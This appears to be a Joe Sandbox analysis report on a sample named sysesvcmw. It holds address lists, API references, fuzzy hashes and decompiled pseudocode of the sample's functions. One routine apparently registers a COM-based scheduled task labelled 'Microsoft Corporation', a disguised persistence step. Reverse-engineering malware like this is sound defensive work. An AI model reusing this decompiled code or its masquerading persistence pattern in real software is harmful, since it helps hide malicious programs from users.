                                                                                                                                                                                                                                                                                    0x0040e2ca
                                                                                                                                                                                                                                                                                    0x0040e2d9
                                                                                                                                                                                                                                                                                    0x0040e2df
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040e2aa
                                                                                                                                                                                                                                                                                    0x0040e2ad
                                                                                                                                                                                                                                                                                    0x0040e2b8
                                                                                                                                                                                                                                                                                    0x0040e2b8
                                                                                                                                                                                                                                                                                    0x0040e2a8

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(?,?,?,?,0040E34C,?,?), ref: 0040E290
                                                                                                                                                                                                                                                                                    • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 0040E2A0
                                                                                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?,?,?,0040E34C,?,?), ref: 0040E2AD
                                                                                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?,?,?,0040E34C,?,?), ref: 0040E2E8
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000006.00000002.409103266.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.409098401.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.409115174.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.409120956.0000000000414000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_400000_ sysesvcmw.jbxd
                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CriticalSection$Leave$EnterExchangeInterlocked
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 2223660684-0
                                                                                                                                                                                                                                                                                    • Opcode ID: e7775c6e724d18b6b16e4560ed2e445d19ec959f5a48ac8fdc33ada78c93d50a
                                                                                                                                                                                                                                                                                    • Instruction ID: e6ac6c1a31680b607f42abd4f6290106e839e9b4de79647b68f4cbd1092355c7
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e7775c6e724d18b6b16e4560ed2e445d19ec959f5a48ac8fdc33ada78c93d50a
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4001DF35242204AFC3209F63ED44ADB73ACAB85B21B00483EE946A3681CB39E441CB38
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                    			E0040BDD0(intOrPtr* _a4) {
                                                                                                                                                                                                                                                                                    				intOrPtr* _v8;
                                                                                                                                                                                                                                                                                    				signed int _v12;
                                                                                                                                                                                                                                                                                    				void* _t20;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				if(_a4 != 0) {
                                                                                                                                                                                                                                                                                    					_v8 = _a4;
                                                                                                                                                                                                                                                                                    					EnterCriticalSection(_v8 + 4);
                                                                                                                                                                                                                                                                                    					_v12 = 0;
                                                                                                                                                                                                                                                                                    					while(_v12 <  *_v8) {
                                                                                                                                                                                                                                                                                    						_t11 = _v8 + 0x1c; // 0xfe5ae850
                                                                                                                                                                                                                                                                                    						CloseHandle( *( *_t11 + _v12 * 4));
                                                                                                                                                                                                                                                                                    						_v12 = _v12 + 1;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					LeaveCriticalSection(_v8 + 4);
                                                                                                                                                                                                                                                                                    					DeleteCriticalSection(_v8 + 4);
                                                                                                                                                                                                                                                                                    					_t18 = _v8 + 0x1c; // 0xfe5ae850
                                                                                                                                                                                                                                                                                    					E00408C70( *_t18);
                                                                                                                                                                                                                                                                                    					return E00408C70(_a4);
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				return _t20;
                                                                                                                                                                                                                                                                                    			}






                                                                                                                                                                                                                                                                                    0x0040bdda
                                                                                                                                                                                                                                                                                    0x0040bddf
                                                                                                                                                                                                                                                                                    0x0040bde9
                                                                                                                                                                                                                                                                                    0x0040bdef
                                                                                                                                                                                                                                                                                    0x0040be01
                                                                                                                                                                                                                                                                                    0x0040be0e
                                                                                                                                                                                                                                                                                    0x0040be18
                                                                                                                                                                                                                                                                                    0x0040bdfe
                                                                                                                                                                                                                                                                                    0x0040bdfe
                                                                                                                                                                                                                                                                                    0x0040be27
                                                                                                                                                                                                                                                                                    0x0040be34
                                                                                                                                                                                                                                                                                    0x0040be3d
                                                                                                                                                                                                                                                                                    0x0040be41
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040be52
                                                                                                                                                                                                                                                                                    0x0040be58

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(0040EC80), ref: 0040BDE9
                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(0040EC84), ref: 0040BE18
                                                                                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(0040EC80), ref: 0040BE27
                                                                                                                                                                                                                                                                                    • DeleteCriticalSection.KERNEL32(0040EC80), ref: 0040BE34
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000006.00000002.409103266.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.409098401.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.409115174.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.409120956.0000000000414000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_400000_ sysesvcmw.jbxd
                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CriticalSection$CloseDeleteEnterHandleLeave
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 3102160386-0
                                                                                                                                                                                                                                                                                    • Opcode ID: d585c410c8feea3006216bdaf8938572b99092e330cb370cdf972aaff2801c2a
                                                                                                                                                                                                                                                                                    • Instruction ID: b4a8df68a5ba6ddb4f07b24493b5635e0034f74153efd53aa39cf24915a517ea
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d585c410c8feea3006216bdaf8938572b99092e330cb370cdf972aaff2801c2a
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EF111E74900208EBDB04DF94D984A9DB7B5FF45309F2081A9E90667341DB35EE90DB99
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • CoInitializeEx.OLE32(00000000,00000002), ref: 00405BA8
                                                                                                                                                                                                                                                                                    • SysAllocString.OLEAUT32(004169D8), ref: 00405BB3
                                                                                                                                                                                                                                                                                    • CoUninitialize.OLE32 ref: 00405BD8
                                                                                                                                                                                                                                                                                      • Part of subcall function 00405910: SysFreeString.OLEAUT32(00000000), ref: 00405B28
                                                                                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 00405BD2
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000006.00000002.409103266.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.409098401.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.409115174.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.409120956.0000000000414000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_400000_ sysesvcmw.jbxd
                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: String$Free$AllocInitializeUninitialize
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 459949847-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 6cd694fec373ba90f407f83b999d67f828c72ca168007c4fd3c8841ffbaea35b
                                                                                                                                                                                                                                                                                    • Instruction ID: 8e1ceaac5e3c15648392f9261d8fa4bd32f1c3ccaf3a14fdf2aec8c3e2deeebf
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6cd694fec373ba90f407f83b999d67f828c72ca168007c4fd3c8841ffbaea35b
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C9E048B5940208FBD704EBE0DD0EB9D7774DB05305F1041B5F50566291DAF99E80CB59
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 62%
                                                                                                                                                                                                                                                                                    			E00405910(intOrPtr _a4) {
                                                                                                                                                                                                                                                                                    				intOrPtr _v8;
                                                                                                                                                                                                                                                                                    				void* _v12;
                                                                                                                                                                                                                                                                                    				void* _v16;
                                                                                                                                                                                                                                                                                    				intOrPtr _v20;
                                                                                                                                                                                                                                                                                    				void* _v24;
                                                                                                                                                                                                                                                                                    				intOrPtr* _v28;
                                                                                                                                                                                                                                                                                    				void* _v32;
                                                                                                                                                                                                                                                                                    				short _v36;
                                                                                                                                                                                                                                                                                    				char _v40;
                                                                                                                                                                                                                                                                                    				intOrPtr _t95;
                                                                                                                                                                                                                                                                                    				intOrPtr _t110;
                                                                                                                                                                                                                                                                                    				void* _t118;
                                                                                                                                                                                                                                                                                    				void* _t199;
                                                                                                                                                                                                                                                                                    				void* _t200;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_v28 = 0;
                                                                                                                                                                                                                                                                                    				_v32 = 0;
                                                                                                                                                                                                                                                                                    				_v16 = 0;
                                                                                                                                                                                                                                                                                    				_v12 = 0;
                                                                                                                                                                                                                                                                                    				_v24 = 0;
                                                                                                                                                                                                                                                                                    				_v8 = 0;
                                                                                                                                                                                                                                                                                    				_v20 = 0;
                                                                                                                                                                                                                                                                                    				while(1) {
                                                                                                                                                                                                                                                                                    					_t95 = E004058C0(0x4120d4, 0x4120e4);
                                                                                                                                                                                                                                                                                    					_t200 = _t199 + 8;
                                                                                                                                                                                                                                                                                    					_v28 = _t95;
                                                                                                                                                                                                                                                                                    					if(_v28 == 0) {
                                                                                                                                                                                                                                                                                    						break;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					_push( &_v32);
                                                                                                                                                                                                                                                                                    					_push(_v28);
                                                                                                                                                                                                                                                                                    					if( *((intOrPtr*)( *((intOrPtr*)( *_v28 + 0x1c))))() == 0) {
                                                                                                                                                                                                                                                                                    						_push( &_v16);
                                                                                                                                                                                                                                                                                    						_push(_v32);
                                                                                                                                                                                                                                                                                    						if( *((intOrPtr*)( *((intOrPtr*)( *_v32 + 0x1c))))() == 0) {
                                                                                                                                                                                                                                                                                    							_push( &_v36);
                                                                                                                                                                                                                                                                                    							_push(_v16);
                                                                                                                                                                                                                                                                                    							if( *((intOrPtr*)( *((intOrPtr*)( *_v16 + 0x20))))() == 0) {
                                                                                                                                                                                                                                                                                    								if(_v36 == 0xffffffff) {
                                                                                                                                                                                                                                                                                    									_push( &_v12);
                                                                                                                                                                                                                                                                                    									_push(_v16);
                                                                                                                                                                                                                                                                                    									if( *((intOrPtr*)( *((intOrPtr*)( *_v16 + 0x50))))() == 0) {
                                                                                                                                                                                                                                                                                    										_push( &_v24);
                                                                                                                                                                                                                                                                                    										_push(_a4);
                                                                                                                                                                                                                                                                                    										_push(_v12);
                                                                                                                                                                                                                                                                                    										if( *((intOrPtr*)( *((intOrPtr*)( *_v12 + 0x28))))() != 0) {
                                                                                                                                                                                                                                                                                    											_t110 = E004058C0(0x4120f4, 0x412104);
                                                                                                                                                                                                                                                                                    											_t199 = _t200 + 8;
                                                                                                                                                                                                                                                                                    											_v24 = _t110;
                                                                                                                                                                                                                                                                                    											if(_v24 != 0) {
                                                                                                                                                                                                                                                                                    												__imp__#2(L"Microsoft Corporation");
                                                                                                                                                                                                                                                                                    												_v8 = _t110;
                                                                                                                                                                                                                                                                                    												if(_v8 != 0) {
                                                                                                                                                                                                                                                                                    													_push(_v8);
                                                                                                                                                                                                                                                                                    													_push(_v24);
                                                                                                                                                                                                                                                                                    													if( *((intOrPtr*)( *((intOrPtr*)( *_v24 + 0x20))))() == 0) {
                                                                                                                                                                                                                                                                                    														_push(_a4);
                                                                                                                                                                                                                                                                                    														_push(_v24);
                                                                                                                                                                                                                                                                                    														if( *((intOrPtr*)( *((intOrPtr*)( *_v24 + 0x28))))() == 0) {
                                                                                                                                                                                                                                                                                    															_t118 =  *((intOrPtr*)( *((intOrPtr*)( *_v24 + 0x38))))(_v24, 0);
                                                                                                                                                                                                                                                                                    															if(_t118 == 0) {
                                                                                                                                                                                                                                                                                    																 *((intOrPtr*)( *((intOrPtr*)( *_v12 + 0x20))))(_v12, _v24);
                                                                                                                                                                                                                                                                                    																_t118 = 0;
                                                                                                                                                                                                                                                                                    																if(0 != 0) {
                                                                                                                                                                                                                                                                                    																	continue;
                                                                                                                                                                                                                                                                                    																}
                                                                                                                                                                                                                                                                                    																L34:
                                                                                                                                                                                                                                                                                    																if(_v20 != 0) {
                                                                                                                                                                                                                                                                                    																	_t118 = E00408C70(_v20);
                                                                                                                                                                                                                                                                                    																}
                                                                                                                                                                                                                                                                                    																if(_v8 != 0) {
                                                                                                                                                                                                                                                                                    																	__imp__#6(_v8);
                                                                                                                                                                                                                                                                                    																}
                                                                                                                                                                                                                                                                                    																if(_v24 != 0) {
                                                                                                                                                                                                                                                                                    																	_t118 =  *((intOrPtr*)( *((intOrPtr*)( *_v24 + 8))))(_v24);
                                                                                                                                                                                                                                                                                    																}
                                                                                                                                                                                                                                                                                    																if(_v12 != 0) {
                                                                                                                                                                                                                                                                                    																	_t118 =  *((intOrPtr*)( *((intOrPtr*)( *_v12 + 8))))(_v12);
                                                                                                                                                                                                                                                                                    																}
                                                                                                                                                                                                                                                                                    																if(_v16 != 0) {
                                                                                                                                                                                                                                                                                    																	_t118 =  *((intOrPtr*)( *((intOrPtr*)( *_v16 + 8))))(_v16);
                                                                                                                                                                                                                                                                                    																}
                                                                                                                                                                                                                                                                                    																if(_v32 != 0) {
                                                                                                                                                                                                                                                                                    																	_t118 =  *((intOrPtr*)( *((intOrPtr*)( *_v32 + 8))))(_v32);
                                                                                                                                                                                                                                                                                    																}
                                                                                                                                                                                                                                                                                    																if(_v28 == 0) {
                                                                                                                                                                                                                                                                                    																	return _t118;
                                                                                                                                                                                                                                                                                    																} else {
                                                                                                                                                                                                                                                                                    																	return  *((intOrPtr*)( *((intOrPtr*)( *_v28 + 8))))(_v28);
                                                                                                                                                                                                                                                                                    																}
                                                                                                                                                                                                                                                                                    															}
                                                                                                                                                                                                                                                                                    															goto L34;
                                                                                                                                                                                                                                                                                    														}
                                                                                                                                                                                                                                                                                    														goto L34;
                                                                                                                                                                                                                                                                                    													}
                                                                                                                                                                                                                                                                                    													goto L34;
                                                                                                                                                                                                                                                                                    												}
                                                                                                                                                                                                                                                                                    												goto L34;
                                                                                                                                                                                                                                                                                    											}
                                                                                                                                                                                                                                                                                    											goto L34;
                                                                                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                                                                                    										_t118 =  *((intOrPtr*)( *((intOrPtr*)( *_v24 + 0x44))))(_v24,  &_v36);
                                                                                                                                                                                                                                                                                    										if(_t118 == 0) {
                                                                                                                                                                                                                                                                                    											if(_v36 != 0xffffffff) {
                                                                                                                                                                                                                                                                                    												 *((intOrPtr*)( *((intOrPtr*)( *_v24 + 0x48))))(_v24, 0xffffffff);
                                                                                                                                                                                                                                                                                    												_t118 =  *((intOrPtr*)( *((intOrPtr*)( *_v24 + 0x38))))(_v24, 0);
                                                                                                                                                                                                                                                                                    											} else {
                                                                                                                                                                                                                                                                                    												_v40 = 0;
                                                                                                                                                                                                                                                                                    												_t118 =  *((intOrPtr*)( *((intOrPtr*)( *_v24 + 0x34))))(_v24,  &_v40);
                                                                                                                                                                                                                                                                                    												if(_t118 == 0 && _v40 != 0) {
                                                                                                                                                                                                                                                                                    													_t118 =  *((intOrPtr*)( *((intOrPtr*)( *_v24 + 0x38))))(_v24, 0);
                                                                                                                                                                                                                                                                                    												}
                                                                                                                                                                                                                                                                                    											}
                                                                                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                                                                                    										goto L34;
                                                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                                                    									goto L34;
                                                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                                                    								goto L34;
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    							goto L34;
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						goto L34;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					goto L34;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				goto L34;
                                                                                                                                                                                                                                                                                    			}

















                                                                                                                                                                                                                                                                                    0x00405916
                                                                                                                                                                                                                                                                                    0x0040591d
                                                                                                                                                                                                                                                                                    0x00405924
                                                                                                                                                                                                                                                                                    0x0040592b
                                                                                                                                                                                                                                                                                    0x00405932
                                                                                                                                                                                                                                                                                    0x00405939
                                                                                                                                                                                                                                                                                    0x00405940
                                                                                                                                                                                                                                                                                    0x00405947
                                                                                                                                                                                                                                                                                    0x00405951
                                                                                                                                                                                                                                                                                    0x00405956
                                                                                                                                                                                                                                                                                    0x00405959
                                                                                                                                                                                                                                                                                    0x00405960
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040596a
                                                                                                                                                                                                                                                                                    0x00405973
                                                                                                                                                                                                                                                                                    0x0040597b
                                                                                                                                                                                                                                                                                    0x00405985
                                                                                                                                                                                                                                                                                    0x0040598e
                                                                                                                                                                                                                                                                                    0x00405996
                                                                                                                                                                                                                                                                                    0x004059a0
                                                                                                                                                                                                                                                                                    0x004059a9
                                                                                                                                                                                                                                                                                    0x004059b1
                                                                                                                                                                                                                                                                                    0x004059bf
                                                                                                                                                                                                                                                                                    0x004059c9
                                                                                                                                                                                                                                                                                    0x004059d2
                                                                                                                                                                                                                                                                                    0x004059da
                                                                                                                                                                                                                                                                                    0x004059e4
                                                                                                                                                                                                                                                                                    0x004059e8
                                                                                                                                                                                                                                                                                    0x004059f1
                                                                                                                                                                                                                                                                                    0x004059f9
                                                                                                                                                                                                                                                                                    0x00405a83
                                                                                                                                                                                                                                                                                    0x00405a88
                                                                                                                                                                                                                                                                                    0x00405a8b
                                                                                                                                                                                                                                                                                    0x00405a92
                                                                                                                                                                                                                                                                                    0x00405a9b
                                                                                                                                                                                                                                                                                    0x00405aa1
                                                                                                                                                                                                                                                                                    0x00405aa8
                                                                                                                                                                                                                                                                                    0x00405aaf
                                                                                                                                                                                                                                                                                    0x00405ab8
                                                                                                                                                                                                                                                                                    0x00405ac0
                                                                                                                                                                                                                                                                                    0x00405ac7
                                                                                                                                                                                                                                                                                    0x00405ad0
                                                                                                                                                                                                                                                                                    0x00405ad8
                                                                                                                                                                                                                                                                                    0x00405aea
                                                                                                                                                                                                                                                                                    0x00405aee
                                                                                                                                                                                                                                                                                    0x00405b02
                                                                                                                                                                                                                                                                                    0x00405b04
                                                                                                                                                                                                                                                                                    0x00405b06
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00405b0c
                                                                                                                                                                                                                                                                                    0x00405b10
                                                                                                                                                                                                                                                                                    0x00405b16
                                                                                                                                                                                                                                                                                    0x00405b1b
                                                                                                                                                                                                                                                                                    0x00405b22
                                                                                                                                                                                                                                                                                    0x00405b28
                                                                                                                                                                                                                                                                                    0x00405b28
                                                                                                                                                                                                                                                                                    0x00405b32
                                                                                                                                                                                                                                                                                    0x00405b40
                                                                                                                                                                                                                                                                                    0x00405b40
                                                                                                                                                                                                                                                                                    0x00405b46
                                                                                                                                                                                                                                                                                    0x00405b54
                                                                                                                                                                                                                                                                                    0x00405b54
                                                                                                                                                                                                                                                                                    0x00405b5a
                                                                                                                                                                                                                                                                                    0x00405b68
                                                                                                                                                                                                                                                                                    0x00405b68
                                                                                                                                                                                                                                                                                    0x00405b6e
                                                                                                                                                                                                                                                                                    0x00405b7c
                                                                                                                                                                                                                                                                                    0x00405b7c
                                                                                                                                                                                                                                                                                    0x00405b82
                                                                                                                                                                                                                                                                                    0x00405b95
                                                                                                                                                                                                                                                                                    0x00405b84
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00405b90
                                                                                                                                                                                                                                                                                    0x00405b82
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00405af0
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00405ada
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00405ac2
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00405aaa
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00405a94
                                                                                                                                                                                                                                                                                    0x00405a0b
                                                                                                                                                                                                                                                                                    0x00405a0f
                                                                                                                                                                                                                                                                                    0x00405a1d
                                                                                                                                                                                                                                                                                    0x00405a62
                                                                                                                                                                                                                                                                                    0x00405a72
                                                                                                                                                                                                                                                                                    0x00405a1f
                                                                                                                                                                                                                                                                                    0x00405a1f
                                                                                                                                                                                                                                                                                    0x00405a36
                                                                                                                                                                                                                                                                                    0x00405a3a
                                                                                                                                                                                                                                                                                    0x00405a50
                                                                                                                                                                                                                                                                                    0x00405a50
                                                                                                                                                                                                                                                                                    0x00405a52
                                                                                                                                                                                                                                                                                    0x00405a74
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00405a0f
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x004059dc
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x004059c1
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x004059b3
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00405998
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040597d
                                                                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                      • Part of subcall function 004058C0: CoCreateInstance.OLE32(00000000,00000000,00004401,00000000,00000000), ref: 004058E0
                                                                                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 00405B28
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000006.00000002.409103266.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.409098401.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.409115174.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.409120956.0000000000414000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_400000_ sysesvcmw.jbxd
                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CreateFreeInstanceString
                                                                                                                                                                                                                                                                                    • String ID: Microsoft Corporation
                                                                                                                                                                                                                                                                                    • API String ID: 586785272-3838278685
                                                                                                                                                                                                                                                                                    • Opcode ID: 5101201dcff8a4348e4f4b8b21c8e9287c00567db6cdf25e3dc099c263020228
                                                                                                                                                                                                                                                                                    • Instruction ID: b966d8a815279bea9682a753b9e4a3ce538f0dcc0c86578e863b9189ac0295eb
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5101201dcff8a4348e4f4b8b21c8e9287c00567db6cdf25e3dc099c263020228
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1691BA75A0050ADFCB04DB98C994EAFB7B5EF88304F208269E515B73A0D778AE41CF65
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 66%
                                                                                                                                                                                                                                                                                    			E0040CC30(char* _a4) {
                                                                                                                                                                                                                                                                                    				char _v8;
                                                                                                                                                                                                                                                                                    				intOrPtr _v12;
                                                                                                                                                                                                                                                                                    				char _v16;
                                                                                                                                                                                                                                                                                    				intOrPtr* _v20;
                                                                                                                                                                                                                                                                                    				void* _v24;
                                                                                                                                                                                                                                                                                    				void* _v28;
                                                                                                                                                                                                                                                                                    				intOrPtr _v32;
                                                                                                                                                                                                                                                                                    				intOrPtr _v36;
                                                                                                                                                                                                                                                                                    				intOrPtr _t44;
                                                                                                                                                                                                                                                                                    				intOrPtr* _t46;
                                                                                                                                                                                                                                                                                    				intOrPtr _t59;
                                                                                                                                                                                                                                                                                    				intOrPtr _t62;
                                                                                                                                                                                                                                                                                    				void* _t88;
                                                                                                                                                                                                                                                                                    				void* _t89;
                                                                                                                                                                                                                                                                                    				void* _t90;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_v16 = 0;
                                                                                                                                                                                                                                                                                    				_t44 = E0040C260(_a4,  &_v8);
                                                                                                                                                                                                                                                                                    				_t89 = _t88 + 8;
                                                                                                                                                                                                                                                                                    				_v12 = _t44;
                                                                                                                                                                                                                                                                                    				if(_v12 != 0) {
                                                                                                                                                                                                                                                                                    					_t46 = E0040C000(_v12);
                                                                                                                                                                                                                                                                                    					_t90 = _t89 + 4;
                                                                                                                                                                                                                                                                                    					_v20 = _t46;
                                                                                                                                                                                                                                                                                    					if(_v20 != 0) {
                                                                                                                                                                                                                                                                                    						_v24 = 0;
                                                                                                                                                                                                                                                                                    						_push( &_v24);
                                                                                                                                                                                                                                                                                    						_push(_v20);
                                                                                                                                                                                                                                                                                    						if( *((intOrPtr*)( *((intOrPtr*)( *_v20 + 0xb4))))() == 0 && _v24 != 0) {
                                                                                                                                                                                                                                                                                    							_v28 = 0;
                                                                                                                                                                                                                                                                                    							_push( &_v28);
                                                                                                                                                                                                                                                                                    							_push(_v24);
                                                                                                                                                                                                                                                                                    							if( *((intOrPtr*)( *((intOrPtr*)( *_v24 + 0x30))))() == 0 && _v28 != 0) {
                                                                                                                                                                                                                                                                                    								_t59 = E0040CBE0(_v28);
                                                                                                                                                                                                                                                                                    								_t90 = _t90 + 4;
                                                                                                                                                                                                                                                                                    								_v32 = _t59;
                                                                                                                                                                                                                                                                                    								if(_v32 != 0) {
                                                                                                                                                                                                                                                                                    									_t62 = E0040CAC0(_v28);
                                                                                                                                                                                                                                                                                    									_t90 = _t90 + 4;
                                                                                                                                                                                                                                                                                    									_v36 = _t62;
                                                                                                                                                                                                                                                                                    									if(_v36 != 0) {
                                                                                                                                                                                                                                                                                    										E0040B3E0( &_v16, "%S%S", _v32);
                                                                                                                                                                                                                                                                                    										_t90 = _t90 + 0x10;
                                                                                                                                                                                                                                                                                    										__imp__#6(_v36, _v36);
                                                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                                                    									__imp__#6(_v32);
                                                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                                                    								 *((intOrPtr*)( *((intOrPtr*)( *_v28 + 8))))(_v28);
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    							 *((intOrPtr*)( *((intOrPtr*)( *_v24 + 8))))(_v24);
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						 *((intOrPtr*)( *((intOrPtr*)( *_v20 + 8))))(_v20);
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					E00408C70(_v12);
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				return _v16;
                                                                                                                                                                                                                                                                                    			}


















                                                                                                                                                                                                                                                                                    0x0040cc36
                                                                                                                                                                                                                                                                                    0x0040cc45
                                                                                                                                                                                                                                                                                    0x0040cc4a
                                                                                                                                                                                                                                                                                    0x0040cc4d
                                                                                                                                                                                                                                                                                    0x0040cc54
                                                                                                                                                                                                                                                                                    0x0040cc5e
                                                                                                                                                                                                                                                                                    0x0040cc63
